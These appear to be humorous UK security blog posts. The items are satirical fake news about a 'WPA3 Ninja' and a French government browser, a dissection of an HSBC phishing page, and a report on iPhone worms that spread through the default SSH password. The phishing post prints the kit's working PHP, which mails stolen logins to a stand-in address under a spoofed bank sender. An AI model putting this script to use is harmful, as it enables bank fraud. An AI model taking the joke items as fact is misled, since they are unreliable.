shewy.co.uk

Wireless internet security is an area that many people still struggle to understand, and are quite happy to use weak or no encryption to protect their juicy airborne packets. Many people pride themselves on having the best firewalls and Anti-Virus software that money can buy, however don’t do wifi security properly. This is basically the same as locking all the doors and windows in a three walled house.

It is hoped that the launch of the next generation of wireless security standard will inspire people to sort out their wireless security.

So whats so good about WPA3? Well, to answer that, you first have to look at which alternatives are available.

No security – As you would imagine, no security means no security. You are like Tesco, open 24 hours a day.

WEP – Weak encryption. Takes about 5 minutes to break, or less depending on how much data is floating around.

WPA/WPA2 – Stronger encryption, almost impossible to break if a strong passphrase is used. The best most home users can use, without having to do some technically advanced setting up of stuff.

WPA3, is basically WPA2 + the instalment of a Ninja, who will wander around the range of your wireless network and physically remove people who are trying to connect. You don’t have to feed or water the Ninja, they are completely self sufficient. The Ninja based system is almost impossible to attack successfully, because everyone knows Ninjas are ace.

WPA3 Ninja - Ace.

Problems arise when two different WPA3 protected networks overlap, if they are both using the same wifi channel. During beta testing several Ninja vs. Ninja battles were reported, however many of them were set up on purpose by developers for their own entertainment.

WPA3 enabled equipment will start rolling out in April. Look out for boxes labelled “supports 802.11WITCHA”.

The French government has officially told it’s peeps to stop using Internet Explorer 6, due to multiple exploits in it that could allow hackers to take over the host computer. Common sense really, seeing as IE6 is two versions out of date. They have suggested alternatives including the beautifully crafted Mozilla Firefox (fair enough), and Google Chrome (about as secure as a Northern Rock mortgage).

They have also announced plans to release their own browser, to keep citizens safe.

Called “Le Navigateur”, it has a feel similar to Apple Safari and includes several enhanced protection features, including filtering of dangerous or upsetting content and a “surrender” button, should a user find themselves in a heated chat room argument that could turn nasty.

Thanks to an insider, known only as Jacques, we have an exclusive screen shot of Le Navigateur.

An example of Le Navigateur's Content Filtering

When I get a Phishing email I tend to examine it, to learn more about the way it works. I got a classic example today, so I’ll share with you how it works.

Delivery – It starts with an email, in this example – the message is supposed to be from HSBC.

Step One: Victim receives poorly worded Email, not from a drunk friend.

So I have to click on the link at the bottom, fair enough, it goes to hsbc.co.uk right? Err, actually no. Hovering the mouse over the link reveals it takes you to a random website. This could be any site that has been hacked, and had the phishing site files uploaded to it. In this case it was a photo framing company.

Reel Big Phish - So the victim clicks the link and heads off to the fake bank site. It looks pretty genuine. Internet Explorer and Firefox will alert if the site has been reported as a phishing site, so if this is a relatively new phish you may not get a warning. In this case IE did tell me I shouldn’t go to the site. I’ve removed the site’s domain name from the URL to protect the company in question, but you can see that the fake site has been set up in a subdirectory of the hacked site.

Step Two: This site is to HSBC as Katie Price is to Boobs.

Entering Details – So the victim enters their login details. The details are then secretly emailed to the phishermen (the bad guys who set up the site). Once the continue button has been pressed the vicitm is redirected to the real HSBC site, and told they have entered an incorrect password. They try again, and this time they login to the genuine site and think nothing of it – until they notice money missing from their bank account a few days later. All very scary.

So how exactly does the fake site email the details to the bad guys? Well, kindly, on this example the phishermen left an entire copy of the fake site in a zip file, so it is possible to examine the source code of the fake pages and find out. Source code, is basically a list of instructions performed by the server hosting a site. There are two elements to source code in web site development, client side and server side. Client Side code renders the page in your browser, so you can always see the results of client side code execution and even view the code if you want to. Server side code, is executed on the web server, and is not normally visible to end users. Thats us.

So in this example when a user enters details and presses the continue button, the following code is executed on the server side.

<?

$ip = getenv(“REMOTE_ADDR”);
$do = “mail”;
$message .= “————–USER———————–\n”;
$message .= “User ID         : “.$_POST['user'].”\n”;
$message .= “Date of Birth         : “.$_POST['dob'].”\n”;
$message .= “Security Number   : “.$_POST['securityno'].”\n”;
$message .= “IP                     : “.$ip.”\n”;
$message .= “————–I MUST RICH—————\n”;
$send = hacker1@randomfreeemailsite.com;
$subject = “HSBC UK | $user | $ip”;
$headers = “From: HSBC <hsbc@bank.co.uk>”;
$headers .= $_POST['name'].”\n”;
$headers .= “MIME-Version: 1.0\n”;
$arr=array($send, $IP);
{
mail($send,$subject,$message,$headers);
                $do($er,$subject,$message,$headers);
}
header(“Location:https://www.hsbc.co.uk/1/screens

/html/SessionWarning/jsp/ExitFusedSite.jsp”);
?>

This code does the following – Collect the Remote IP address of the victim, then get the values entered for User ID, Date of Birth and Security Number. The mail this information to the email address specified in the code. The email address is usually set up on a  free email host, in this example I have changed the actual email addresses used by the bad guys. Then finally it redirects the victim to the real HSBC site. Crafty swines.

So, a general rule, never follow links in emails. You don’t wanna get caught by the phishermen!

Yesterday I wrote about the first worm to attack the iPhone, I mentioned how it wasn’t all that nasty, but probably would inspire nasty worms. I was right, yay! “iPhone-Privacy-A” – This works on the same principle as the RickRolling worm, but it’ll steal user data and then delete it, without letting you know it’s been there. Nice. So be careful, and like I said yesterday if you use a Jail-Broken iPhone with SSH installed – change the password!

The first “Worm” to attack the Apple iPhone has been created and deployed into the wild in Australia, where it is spreading like…erm…yeah I won’t say that, probably a bit too soon.  There have been various other exploits against iPhone’s in the past, but this is slightly different, as it is a worm, it quickly self replicates and spreads, a bit like Davina McCall.

There are two reasons why you shouldn’t panic. One – it ain’t a nasty worm. It changes the wallpaper on the iPhone to a pic of Rick Astley. In fact, if Rick Astley had an iPhone, he probably wouldn’t mind getting the worm. Two – it only affects “Jailbroken” iPhones, that is iPhones that have been modded to remove Apple’s in built security and have secure shell (SSH) installed. It spreads using SSH and the default root password, which is “alpine”.  So really, it’s more of a Linux worm.

The time to panic will come if malicious hackers start to build cleverer payloads, that steal or destroy the phone’s contents.  Which, trust me, they will. In fact, they probably already have. It’s worth remembering, if you have an iPhone, or even an iPod, it should be treated in exactly the same manner as your home PC or laptop when it comes to security, because it is a tiny computer.

The number of iPhones in the wild has jumped significantly today, as Orange customers in the UK can now go get one, and I’m sure a few O2 customers have jumped ship too. Go and check out the difference in the two providers 3G networks if you want to know why!

Now I’m going to go eat some fruit, what with all this talk of apples and oranges…